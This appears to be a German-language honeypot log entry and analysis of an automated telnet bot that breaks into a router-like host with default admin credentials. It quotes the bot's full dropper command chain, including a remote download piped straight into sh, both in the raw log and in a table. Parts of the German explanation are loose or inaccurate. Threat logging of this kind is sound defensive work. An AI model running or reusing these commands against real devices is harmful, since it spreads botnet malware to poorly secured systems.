29.09.2026 · Malware-Dropper · 7 Anfragen · Dauer keine Angabe · Indonesien
7 verschiedene Sitzungen (7 Durchläufe) von 7 IPs, Länder: ID (2), IN (1), US (1). Dienst: telnet/23. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.
auth_ok
user='admin' pass='admin' admin@srv01:~$ id admin@srv01:~$ cat /etc/passwd admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" uid=1000(admin) gid=1000(admin) groups=1000(admin),27(sudo) root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List admin@srv01:~$ enable admin@srv01:~$ system admin@srv01:~$ shell admin@srv01:~$ sh admin@srv01:~$ bash admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- admin@srv01:~$ [Token] admin@srv01:~$ [Token] admin@srv01:~$ [Token] admin@srv01:~$ [Token] admin@srv01:~$ [Token] admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x bash: enable: no such builtin function bash: system: command not found bash: shell: command not found sh: 0: Illegal option - bash: cd: /dev/shm: No such file or directory bash: key.ppk: Permission denied bash: sshcfg: Permission denied bash: chmod: Permission denied bash: scp: command not found bash: wget: command not found bash: curl: command not found bash: rm: Permission denied redbot_telnet_ok
Der Angreifer nutzte Standardzugangsdaten, um sich als Administrator auf einem Router anzumelden. Nach der erfolgreichen Authentifizierung wechselte er in die Shell-Umgebung des Geräts. Dort erstellte er eine SSH-Schlüsseldatei und eine Konfigurationsdatei, um eine verschlüsselte Verbindung zu einem externen Server aufzubauen. Abschließend versuchte er, ein Skript herunterzuladen und auszuführen, das eine Telnet-Verbindung initiieren soll.
Die Befehle id und cat /etc/passwd dienen der Systemerkennung und der Prüfung der Benutzerrechte. Die enable, system und shell Befehle sind typisch für Cisco-Router, um in die privilegierte Shell zu gelangen. Der echo-Befehl schreibt einen Base64-kodierten SSH-Privatschlüssel in eine Datei namens key.ppk. Die Datei sshcfg deaktiviert die Host-Key-Prüfung, um Man-in-the-Middle-Angriffe zu umgehen. Der scp-Befehl lädt dann das Skript out_sh vom Angreiferserver herunter und führt es mit chmod +x aus.
Das Ziel ist die Installation eines Botnet-Agents oder eines Kryptominers auf dem Router. Dies erkennt man an dem Versuch, einen externen Code über SCP zu laden und auszuführen. Der Marker auth_ok bestätigt, dass die Schwachstelle durch schwache Passwörter ausgenutzt wurde.
Dies ist ein sehr verbreiteter automatisierter Angriff, der gezielt Router mit Standardpasswörtern ins Visier nimmt. Die Nutzung von SCP statt HTTP ist eine etwas raffiniertere Methode, um Traffic zu verschleiern.
| Zeit | Methode | Pfad / Payload | Muster |
|---|---|---|---|
| +0 s | CMD | id | |
| +0 s | CMD | cat /etc/passwd | |
| +0 s | CMD | echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" | |
| +0 s | CMD | enable | |
| +0 s | CMD | system | |
| +0 s | CMD | shell | |
| +0 s | CMD | sh | |
| +0 s | CMD | bash | |
| +0 s | CMD | cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- | |
| +0 s | CMD | [Token] | |
| +0 s | CMD | -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no | |
| +0 s | CMD | UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s t |